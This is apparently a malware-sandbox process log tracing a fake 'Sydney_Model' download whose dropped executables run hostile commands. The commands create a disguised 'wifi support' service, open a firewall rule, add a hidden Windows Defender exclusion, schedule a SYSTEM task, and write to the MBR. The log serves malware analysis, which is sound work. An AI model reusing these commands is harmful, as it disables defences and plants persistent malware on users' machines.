  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1852 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
  2⤵
  PID:3200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1952 /prefetch:1
  2⤵
  PID:5148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1
  2⤵
  PID:2612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
  2⤵
  PID:2020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7548 /prefetch:1
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6824 /prefetch:1
  2⤵
  PID:5508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1
  2⤵
  PID:4308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1
  2⤵
  PID:5636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1
  2⤵
  PID:5144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7040 /prefetch:1
  2⤵
  PID:2184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7840 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6876 /prefetch:1
  2⤵
  PID:5636
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"
  2⤵
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:5288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2088 /prefetch:1
  2⤵
  PID:3108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7588 /prefetch:1
  2⤵
  PID:5336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
  2⤵
  PID:1792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
  2⤵
  PID:5872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
  2⤵
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:1
  2⤵
  PID:5672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:1
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:1
  2⤵
  PID:2404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8732 /prefetch:1
  2⤵
  PID:5204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8848 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:1
  2⤵
  PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9052 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8892 /prefetch:1
  2⤵
  PID:1644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:1968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9168 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
  2⤵
  PID:5488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2916 /prefetch:1
  2⤵
  PID:5680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:1
  2⤵
  PID:2484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,12229139479338636761,16244828112896370215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6728 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5760

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2576

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2c8 0x150
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5168

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:1460

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:6004

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3172

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap5062:194:7zEvent16653 -t7z -sae -- "C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\image_2.7z"
1⤵
PID:5752

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\" -an -ai#7zMap1684:194:7zEvent21174
1⤵
PID:5508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\unpack.bat" "
1⤵
PID:1476
- C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\1.jpg
  "1.jpg" x -p8652 "image.7z" -o"."
  2⤵
  PID:5664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\unpack.bat" "
1⤵
PID:5784
- C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\1.jpg
  "1.jpg" x -p8652 "image.7z" -o"."
  2⤵
  PID:5080

C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\setup.exe
"C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:976
- C:\Users\Admin\Documents\SimpleAdobe\T0qJC09GvDEuSkMeGFLdaMFx.exe
  C:\Users\Admin\Documents\SimpleAdobe\T0qJC09GvDEuSkMeGFLdaMFx.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5580
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\neosowbb\
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jhrsuqtz.exe" C:\Windows\SysWOW64\neosowbb\
    3⤵
    PID:2436
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create neosowbb binPath= "C:\Windows\SysWOW64\neosowbb\jhrsuqtz.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\T0qJC09GvDEuSkMeGFLdaMFx.exe\"" type= own start= auto DisplayName= "wifi support"
    3⤵
    - Launches sc.exe
    PID:2356
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description neosowbb "wifi internet conection"
    3⤵
    - Launches sc.exe
    PID:4436
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start neosowbb
    3⤵
    - Launches sc.exe
    PID:5664
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1560
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 580
    3⤵
    - Program crash
    PID:2916
- C:\Users\Admin\Documents\SimpleAdobe\v40EpIKMih9Aj2cY77veyjMv.exe
  C:\Users\Admin\Documents\SimpleAdobe\v40EpIKMih9Aj2cY77veyjMv.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:4552
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:5076
- C:\Users\Admin\Documents\SimpleAdobe\CoqwRomIrFLLCP5o_FouY1Mj.exe
  C:\Users\Admin\Documents\SimpleAdobe\CoqwRomIrFLLCP5o_FouY1Mj.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5700
- - C:\Users\Admin\AppData\Local\Temp\is-LALAS.tmp\CoqwRomIrFLLCP5o_FouY1Mj.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-LALAS.tmp\CoqwRomIrFLLCP5o_FouY1Mj.tmp" /SL5="$150030,5056016,54272,C:\Users\Admin\Documents\SimpleAdobe\CoqwRomIrFLLCP5o_FouY1Mj.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:5500
  - - C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher.exe
      "C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3264
  - - C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher.exe
      "C:\Users\Admin\AppData\Local\Audio Output Switcher\audiooutputswitcher.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2180
- C:\Users\Admin\Documents\SimpleAdobe\eIDDb3XYxvYHWrDy5a12tKEm.exe
  C:\Users\Admin\Documents\SimpleAdobe\eIDDb3XYxvYHWrDy5a12tKEm.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:6000
- C:\Users\Admin\Documents\SimpleAdobe\17XdHxjg4RYuOASnCjvnJ40P.exe
  C:\Users\Admin\Documents\SimpleAdobe\17XdHxjg4RYuOASnCjvnJ40P.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:1180
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:6120
- C:\Users\Admin\Documents\SimpleAdobe\0bhjjDkdpE9G15ynZICCXL2r.exe
  C:\Users\Admin\Documents\SimpleAdobe\0bhjjDkdpE9G15ynZICCXL2r.exe
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:4584
- C:\Users\Admin\Documents\SimpleAdobe\xdMbQGthmM5A5ydjQA8PDq6k.exe
  C:\Users\Admin\Documents\SimpleAdobe\xdMbQGthmM5A5ydjQA8PDq6k.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5936
- - C:\Users\Admin\AppData\Local\Temp\7zSE851.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:112
  - - C:\Users\Admin\AppData\Local\Temp\7zSFA71.tmp\Install.exe
      .\Install.exe /ArdidsYzES "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:3136
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2740
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5540
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:1436
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmEYWRTMKrukfekPRJ" /SC once /ST 08:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSFA71.tmp\Install.exe\" AG /UCDdidJQf 525403 /S" /V1 /F
